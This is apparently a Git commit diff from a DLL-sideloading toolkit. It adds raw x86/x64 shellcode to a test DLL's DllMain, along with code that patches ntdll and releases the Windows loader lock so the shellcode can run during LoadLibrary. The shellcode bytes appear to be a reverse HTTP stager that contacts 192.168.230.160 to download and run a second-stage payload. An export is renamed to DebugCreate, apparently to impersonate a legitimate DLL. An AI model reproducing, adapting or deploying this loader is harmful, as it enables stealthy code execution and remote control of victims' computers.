STRLCPY/SearchAvailableExe

解决使用LoadLibrary方式的dllmain加载shellcode死锁问题
maoku committed 2 months ago

372d24e8

1 parent 475c6e35

■ ■ ■ ■ ■ ■

SearchAvailableExe/SearchAvailableExe.vcxproj.user

1	1		<?xml version="1.0" encoding="utf-8"?>
2	2		<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3	3		<PropertyGroup Condition="'$(Configuration)\|$(Platform)'=='Debug\|Win32'">
4		-	<LocalDebuggerCommandArguments>-i "D:"</LocalDebuggerCommandArguments>
	4	+	<LocalDebuggerCommandArguments>
	5	+	</LocalDebuggerCommandArguments>
5	6		<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
6	7		</PropertyGroup>
7	8		<PropertyGroup Condition="'$(Configuration)\|$(Platform)'=='Debug\|x64'">
8		-	<LocalDebuggerCommandArguments>-i "D:"</LocalDebuggerCommandArguments>
	9	+	<LocalDebuggerCommandArguments>
	10	+	</LocalDebuggerCommandArguments>
9	11		<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
10	12		</PropertyGroup>
11	13		</Project>

■ ■ ■ ■ ■ ■

TestLoad/TestLoad.vcxproj

		skipped 91 lines
92	92		<IntrinsicFunctions>true</IntrinsicFunctions>
93	93		<SDLCheck>true</SDLCheck>
94	94		<PreprocessorDefinitions>WIN32;NDEBUG;TESTLOAD_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
95		-	<ConformanceMode>true</ConformanceMode>
	95	+	<ConformanceMode>false</ConformanceMode>
96	96		<PrecompiledHeader>NotUsing</PrecompiledHeader>
97	97		<PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
98	98		<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
	99	+	<Optimization>MaxSpeed</Optimization>
	100	+	<WholeProgramOptimization>true</WholeProgramOptimization>
99	101		</ClCompile>
100	102		<Link>
101	103		<SubSystem>Windows</SubSystem>
		skipped 1 lines
103	105		<OptimizeReferences>true</OptimizeReferences>
104	106		<GenerateDebugInformation>false</GenerateDebugInformation>
105	107		<EnableUAC>false</EnableUAC>
	108	+	<AdditionalDependencies>ntdll.lib;%(AdditionalDependencies)</AdditionalDependencies>
106	109		</Link>
107	110		</ItemDefinitionGroup>
108	111		<ItemDefinitionGroup Condition="'$(Configuration)\|$(Platform)'=='Debug\|x64'">
		skipped 22 lines
131	134		<PrecompiledHeader>NotUsing</PrecompiledHeader>
132	135		<PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
133	136		<RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary>
	137	+	<Optimization>Disabled</Optimization>
	138	+	<WholeProgramOptimization>false</WholeProgramOptimization>
134	139		</ClCompile>
135	140		<Link>
136	141		<SubSystem>Windows</SubSystem>
		skipped 1 lines
138	143		<OptimizeReferences>true</OptimizeReferences>
139	144		<GenerateDebugInformation>false</GenerateDebugInformation>
140	145		<EnableUAC>false</EnableUAC>
	146	+	<AdditionalDependencies>%(AdditionalDependencies)</AdditionalDependencies>
141	147		</Link>
142	148		</ItemDefinitionGroup>
143	149		<ItemGroup>
		skipped 9 lines

■ ■ ■ ■ ■ ■ ■

TestLoad/dllmain.cpp

		skipped 1 lines
2	2
3	3		#include "export.hpp"
4	4
5		-	BOOL APIENTRY DllMain( HMODULE hModule,
6		-	DWORD ul_reason_for_call,
7		-	LPVOID lpReserved
8		-	)
	5	+	void runShellcode() {
	6	+	#ifdef _WIN64
	7	+	unsigned char buf[] = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x50\x00\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x77\x62\x33\x51\x00\xbe\x54\x9b\xd2\x7c\xfa\x60\x3e\xf5\x66\xf0\x09\xea\x24\x0f\xba\x3f\x08\x24\xf9\x38\x21\xe0\x96\x96\xd8\x89\x1e\x48\x7c\xa1\xf9\xd9\xcc\x90\x0e\x6f\xd5\x45\x57\x5b\xfb\xdb\xa3\x70\x03\xb0\xee\xeb\xd9\x79\x98\x45\x23\xba\x64\x8a\x94\x74\x50\x18\xdc\xc1\x2b\x20\x0d\x12\x0d\xe7\xa8\x97\x83\x2e\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x30\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x3b\x20\x6d\x73\x6e\x20\x4f\x70\x74\x69\x6d\x69\x7a\x65\x64\x49\x45\x38\x3b\x45\x4e\x55\x53\x29\x0d\x0a\x00\x71\xd2\x43\x20\x55\x08\xd3\x23\x34\xfc\xd2\xd1\xe2\x4f\xec\x22\x44\xc6\x9d\x09\xba\x8b\x26\x94\x39\xfb\xac\x61\xc8\xf8\x04\x70\x46\x24\xda\xb4\x08\x0b\xd2\x41\x5d\x26\xc9\x5c\xdf\xd3\xb4\x5c\x4d\x3a\xa4\x8c\x02\x64\x8c\xfb\xc7\x13\xb4\xb6\xdc\x3a\xef\x24\x38\x22\xb2\x88\x05\xc4\x50\x26\x1d\xb5\x02\x11\x31\xdb\x03\xc1\xf4\xb5\xe7\x8b\x84\x82\xea\xca\xad\xd9\x1e\x3f\xe2\x56\x79\xc7\xd8\x45\x13\xd4\x68\x50\xf9\x5f\x73\x5b\xf2\xb3\x67\x66\xec\x43\xb7\x41\x14\x6b\x0c\xcc\x26\x23\x3f\x86\x3a\xc1\x36\x0e\x9e\x74\xb0\x54\x2b\x4f\xa4\x6f\x75\x9e\xb6\x0b\x57\xa9\xf1\x79\x49\x32\xe5\xf2\x0a\xa9\x6a\x0e\xbe\x15\xd1\x2e\x53\x8d\x29\x3e\xb5\x90\xda\x81\x9c\xfa\x2f\x4c\xd0\x2d\xae\xdb\x13\x1c\xbf\x79\x4a\x6f\x5a\xe9\x62\x4b\x75\xeb\x19\xc8\xb2\x1b\x94\x32\xcb\xab\x62\x24\xf0\x81\x8e\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x32\x33\x30\x2e\x31\x36\x30\x00\x27\xbc\x86\xaa";
	8	+	#else
	9	+	unsigned char buf[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\x50\x00\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x40\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x33\x4c\x65\x78\x00\x1e\x2a\x49\x6f\x20\xa4\x24\x44\x23\xc5\x0f\xee\x14\x50\x02\xcd\x9c\x65\x33\xae\x94\xd0\x66\x47\x44\x06\xb2\x4a\xb6\xe0\xf8\x75\xb4\x21\x57\xb8\x8c\x10\xe5\xe3\x1e\xb6\xf6\xab\x3c\x72\xc6\x88\xcc\xe4\x82\xc9\x2d\xd8\x30\x70\x58\x93\x4b\x02\x38\xcb\xd0\x75\x60\x8e\xf7\x25\x37\x08\xcb\x29\x5e\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x37\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x35\x2e\x31\x29\x0d\x0a\x00\xfc\xc9\x44\x0c\xbb\x1e\x52\x72\x6f\x37\xf0\x38\x19\x4f\x76\x23\xef\xcc\x2d\xb2\xed\x0c\x1f\x6b\xc4\xa3\xe3\x1d\x5b\x72\xcc\x44\x57\xbc\x26\x36\x37\x7b\xae\x4b\x30\xed\x07\x07\x0b\x96\xe7\xfe\xbf\xac\x68\xe6\xb5\x4b\x99\x53\x7e\x3f\x9e\x92\x53\xcf\x77\x90\x85\x62\xe5\x36\x90\xe8\x42\xb6\x1b\xee\xed\x22\x81\xb5\x68\x31\x09\xdf\x74\x72\x56\xbb\xb7\xd0\x24\x26\x2c\xd1\x81\x72\x07\x90\xb6\x34\x55\xcc\x78\xd8\x61\x2c\xb5\x70\x50\x08\xb9\xd4\x3a\x89\xbf\xd2\x34\xee\x02\x5d\xf5\xe8\xf8\xd6\x2a\x96\x19\x8a\x7e\x14\x1a\x4e\xbd\x58\xf2\x5c\x6e\xd5\x7e\x08\x1b\x1f\x3d\xd9\xde\xf5\xee\x4e\x80\x1f\xa7\x97\x31\x0c\x34\x6a\xa2\x09\x20\xad\x34\x66\xc4\x6d\x81\x84\x68\x93\x6a\x8c\xc4\xee\xb7\x52\x11\xa0\xb4\x74\xd8\x21\x86\xb8\x4e\x0c\x94\x85\x60\x24\x0a\x67\x20\x8d\x59\x18\x24\x82\xb1\x00\x58\x28\xd0\x78\x15\x35\x4b\x86\x76\x0b\x68\x04\x4b\xf3\xb2\xce\x1f\x0a\x6d\x23\x63\x90\x5e\x10\x14\xab\x67\xe4\x36\x25\xe8\xe6\xc9\x8e\xeb\x22\xfb\x1c\x4d\x9c\x17\x9e\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x32\x33\x30\x2e\x31\x36\x30\x00\x27\xbc\x86\xaa";
	10	+	#endif
	11	+
	12	+	LPVOID shellcode = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT \| MEM_RESERVE, 0x40);
	13	+
	14	+	memcpy(shellcode, buf, sizeof(buf));
	15	+
	16	+	void(*func)();
	17	+	func = (void(*)())shellcode;
	18	+	func();
	19	+	}
	20	+
	21	+	typedef struct _LSA_UNICODE_STRING {
	22	+	USHORT Length;
	23	+	USHORT MaximumLength;
	24	+	PWSTR Buffer;
	25	+	} LSA_UNICODE_STRING, * PLSA_UNICODE_STRING, UNICODE_STRING, * PUNICODE_STRING;
	26	+	typedef struct _STRING {
	27	+	USHORT Length;
	28	+	USHORT MaximumLength;
	29	+	PCHAR Buffer;
	30	+	} ANSI_STRING, * PANSI_STRING;
	31	+
	32	+	typedef struct _PEB_LDR_DATA {
	33	+	ULONG Length;
	34	+	ULONG Initialized;
	35	+	PVOID SsHandle;
	36	+	LIST_ENTRY InLoadOrderModuleList;
	37	+	LIST_ENTRY InMemoryOrderModuleList;
	38	+	LIST_ENTRY InInitializationOrderModuleList;
	39	+	} PEB_LDR_DATA, * PPEB_LDR_DATA;
	40	+	typedef struct _CURDIR {
	41	+	UNICODE_STRING DosPath;
	42	+	PVOID Handle;
	43	+	}CURDIR, * PCURDIR;
	44	+	typedef struct _RTL_DRIVE_LETTER_CURDIR {
	45	+	WORD Flags;
	46	+	WORD Length;
	47	+	ULONG TimeStamp;
	48	+	ANSI_STRING DosPath;
	49	+	} RTL_DRIVE_LETTER_CURDIR, * PRTL_DRIVE_LETTER_CURDIR;
	50	+
	51	+	typedef struct _RTL_USER_PROCESS_PARAMETERS {
	52	+	ULONG MaximumLength;
	53	+	ULONG Length;
	54	+	ULONG Flags;
	55	+	ULONG DebugFlags;
	56	+	PVOID ConsoleHandle;
	57	+	ULONG ConsoleFlags;
	58	+	PVOID StandardInput;
	59	+	PVOID StandardOutput;
	60	+	PVOID StandardError;
	61	+	CURDIR CurrentDirectory;
	62	+	UNICODE_STRING DllPath;
	63	+	UNICODE_STRING ImagePathName;
	64	+	UNICODE_STRING CommandLine;
	65	+	PVOID Environment;
	66	+	ULONG StartingX;
	67	+	ULONG StartingY;
	68	+	ULONG CountX;
	69	+	ULONG CountY;
	70	+	ULONG CountCharsX;
	71	+	ULONG CountCharsY;
	72	+	ULONG FillAttribute;
	73	+	ULONG WindowFlags;
	74	+	ULONG ShowWindowFlags;
	75	+	UNICODE_STRING WindowTitle;
	76	+	UNICODE_STRING DesktopInfo;
	77	+	UNICODE_STRING ShellInfo;
	78	+	UNICODE_STRING RuntimeData;
	79	+	RTL_DRIVE_LETTER_CURDIR CurrentDirectores[32];
	80	+	ULONG EnvironmentSize;
	81	+	}RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS;
	82	+
	83	+	typedef struct _PEB {
	84	+	BOOLEAN InheritedAddressSpace;
	85	+	BOOLEAN ReadImageFileExecOptions;
	86	+	BOOLEAN BeingDebugged;
	87	+	BOOLEAN Spare;
	88	+	HANDLE Mutant;
	89	+	PVOID ImageBase;
	90	+	PPEB_LDR_DATA LoaderData;
	91	+	PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
	92	+	PVOID SubSystemData;
	93	+	PVOID ProcessHeap;
	94	+	PVOID FastPebLock;
	95	+	PVOID FastPebLockRoutine;
	96	+	PVOID FastPebUnlockRoutine;
	97	+	ULONG EnvironmentUpdateCount;
	98	+	PVOID* KernelCallbackTable;
	99	+	PVOID EventLogSection;
	100	+	PVOID EventLog;
	101	+	PVOID FreeList;
	102	+	ULONG TlsExpansionCounter;
	103	+	PVOID TlsBitmap;
	104	+	ULONG TlsBitmapBits[0x2];
	105	+	PVOID ReadOnlySharedMemoryBase;
	106	+	PVOID ReadOnlySharedMemoryHeap;
	107	+	PVOID* ReadOnlyStaticServerData;
	108	+	PVOID AnsiCodePageData;
	109	+	PVOID OemCodePageData;
	110	+	PVOID UnicodeCaseTableData;
	111	+	ULONG NumberOfProcessors;
	112	+	ULONG NtGlobalFlag;
	113	+	BYTE Spare2[0x4];
	114	+	LARGE_INTEGER CriticalSectionTimeout;
	115	+	ULONG HeapSegmentReserve;
	116	+	ULONG HeapSegmentCommit;
	117	+	ULONG HeapDeCommitTotalFreeThreshold;
	118	+	ULONG HeapDeCommitFreeBlockThreshold;
	119	+	ULONG NumberOfHeaps;
	120	+	ULONG MaximumNumberOfHeaps;
	121	+	PVOID** ProcessHeaps;
	122	+	PVOID GdiSharedHandleTable;
	123	+	PVOID ProcessStarterHelper;
	124	+	PVOID GdiDCAttributeList;
	125	+	PVOID LoaderLock;
	126	+	ULONG OSMajorVersion;
	127	+	ULONG OSMinorVersion;
	128	+	ULONG OSBuildNumber;
	129	+	ULONG OSPlatformId;
	130	+	ULONG ImageSubSystem;
	131	+	ULONG ImageSubSystemMajorVersion;
	132	+	ULONG ImageSubSystemMinorVersion;
	133	+	ULONG GdiHandleBuffer[0x22];
	134	+	ULONG PostProcessInitRoutine;
	135	+	ULONG TlsExpansionBitmap;
	136	+	BYTE TlsExpansionBitmapBits[0x80];
	137	+	ULONG SessionId;
	138	+	} PEB, * PPEB;
	139	+
	140	+	PPEB GetPeb(VOID)
	141	+	{
	142	+	#if defined(_WIN64)
	143	+	return (PPEB)__readgsqword(0x60);
	144	+	#elif defined(_WIN32)
	145	+	return (PPEB)__readfsdword(0x30);
	146	+	#endif
	147	+	}
	148	+
	149	+	size_t memFind(BYTE* mem, BYTE* search, size_t memSize, size_t length)
	150	+	{
	151	+	size_t end = length - 1;
	152	+	size_t begin = 0;
	153	+	BOOL tmp;
	154	+
	155	+	if (memSize < size_t(mem)) {
	156	+	//反向搜索
	157	+	for (size_t i = 0; size_t(mem) - i >= memSize; i++)
	158	+	{
	159	+	tmp = TRUE;
	160	+
	161	+	while (begin <= end)
	162	+	{
	163	+	if ((search[begin] != 0xFF && (mem - i + begin) != search[begin]) \|\| (search[end] != 0xFF && (mem - i + end) != search[end]))
	164	+	{
	165	+	tmp = FALSE;
	166	+	break;
	167	+	}
	168	+
	169	+	begin++;
	170	+	}
	171	+	if (tmp)
	172	+	return size_t(mem) - i;
	173	+	else
	174	+	begin = 0;
	175	+	}
	176	+	}
	177	+	else {
	178	+	for (size_t i = 0; i + size_t(mem) < memSize; i++)
	179	+	{
	180	+	tmp = TRUE;
	181	+
	182	+	while (begin <= end)
	183	+	{
	184	+	if ((search[begin] != 0xFF && (mem + i + begin) != search[begin]) \|\| (search[end] != 0xFF && (mem + i + end) != search[end]))
	185	+	{
	186	+	tmp = FALSE;
	187	+	break;
	188	+	}
	189	+
	190	+	begin++;
	191	+	}
	192	+	if (tmp)
	193	+	return size_t(mem) + i;
	194	+	else
	195	+	begin = 0;
	196	+	}
	197	+	}
	198	+
	199	+	return 0;
	200	+	}
	201	+
	202	+	size_t GetSkipFileAPIBrokering(VOID)
	203	+	{
	204	+	#if defined(_WIN64)
	205	+	return __readgsqword(0x30) + 0x17EE;
	206	+	#elif defined(_WIN32)
	207	+	return __readfsdword(0x18) + 0xFCA;
	208	+	#endif
	209	+	}
	210	+
	211	+	#ifdef _WIN64
	212	+	unsigned char lock_count_flag[] = { 0x66, 0x21, 0x88, 0xEE, 0x17, 0x00, 0x00 };
	213	+	#else
	214	+	unsigned char lock_count_flag[] = {0x66, 0x21, 0x88, 0xCA, 0x0F, 0x00, 0x00, 0xE8};
	215	+	#endif
	216	+
	217	+	VOID UNLOOK()
	218	+	{
	219	+	HMODULE base = GetModuleHandleA("ntdll.dll");
	220	+	PIMAGE_DOS_HEADER pDH = (PIMAGE_DOS_HEADER)base;
	221	+	DWORD size_of_img;
	222	+
	223	+	if (*(PWORD)((size_t)pDH + pDH->e_lfanew + 0x18) == IMAGE_NT_OPTIONAL_HDR32_MAGIC){
	224	+	PIMAGE_NT_HEADERS32 pNtH32 = PIMAGE_NT_HEADERS32((size_t)pDH + pDH->e_lfanew);
	225	+	PIMAGE_OPTIONAL_HEADER32 pOH32 = &pNtH32->OptionalHeader;
	226	+
	227	+	size_of_img = pOH32->SizeOfImage;
	228	+	}
	229	+	else {
	230	+	PIMAGE_NT_HEADERS64 pNtH64 = PIMAGE_NT_HEADERS64((size_t)pDH + pDH->e_lfanew);
	231	+	PIMAGE_OPTIONAL_HEADER64 pOH64 = &pNtH64->OptionalHeader;
	232	+
	233	+	size_of_img = pOH64->SizeOfImage;
	234	+	}
	235	+
	236	+	//适用于win7以上的系统，需要格外修改值
	237	+	size_t addr = memFind((BYTE*)base, lock_count_flag, (size_t)base + size_of_img, sizeof(lock_count_flag));
	238	+	Sleep(1);
	239	+	if (addr != 0)
	240	+	{
	241	+	#ifdef _WIN64
	242	+	addr = (size_t)addr + 0x15;
	243	+	addr = addr + 5 + *(PDWORD)addr;
	244	+	(PDWORD)addr = ((PDWORD)addr) & 0;
	245	+	#else
	246	+	addr = (size_t)addr + 0xe;
	247	+	addr = *(PDWORD)addr;
	248	+	(PDWORD)addr = ((PDWORD)addr) & 0;
	249	+	#endif
	250	+
	251	+	size_t skipFileAPIBrokeringAddr = GetSkipFileAPIBrokering();
	252	+	((PWORD)skipFileAPIBrokeringAddr) = ((PWORD)skipFileAPIBrokeringAddr) & 0xEFFF;
	253	+	}
	254	+
	255	+	PPEB Peb = GetPeb();
	256	+	HMODULE hModule = GetModuleHandleA("ntdll.dll");
	257	+	if (hModule == NULL)
	258	+	return;
	259	+
	260	+	typedef NTSTATUS(NTAPI* RTLLEAVECRITICALSECTION)(PRTL_CRITICAL_SECTION CriticalSection);
	261	+
	262	+	RTLLEAVECRITICALSECTION RtlLeaveCriticalSection = NULL;
	263	+
	264	+	RtlLeaveCriticalSection = (RTLLEAVECRITICALSECTION)GetProcAddress((HMODULE)hModule, "RtlLeaveCriticalSection");
	265	+
	266	+	RtlLeaveCriticalSection((PRTL_CRITICAL_SECTION)Peb->LoaderLock);
	267	+	}
	268	+
	269	+	BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
9	270		{
10	271		switch (ul_reason_for_call)
11	272		{
12	273		case DLL_PROCESS_ATTACH:
13		-	//exit(0x1D7F9D44);
14		-	case DLL_THREAD_ATTACH:
15		-	case DLL_THREAD_DETACH:
16		-	case DLL_PROCESS_DETACH:
17		-	break;
	274	+	UNLOOK();
	275	+
	276	+	runShellcode();
18	277		}
19	278		return TRUE;
20	279		}
21	280
22		-

■ ■ ■ ■ ■ ■

TestLoad/export.hpp

1		-	extern "C" __declspec(dllexport) int TestLoad__________________________________________________________________________________________________1() {
	1	+	extern "C" __declspec(dllexport) int DebugCreate() {
2	2		return 1;
3	3		}
4	4
		skipped 395 lines

解决使用LoadLibrary方式的dllmain加载shellcode死锁问题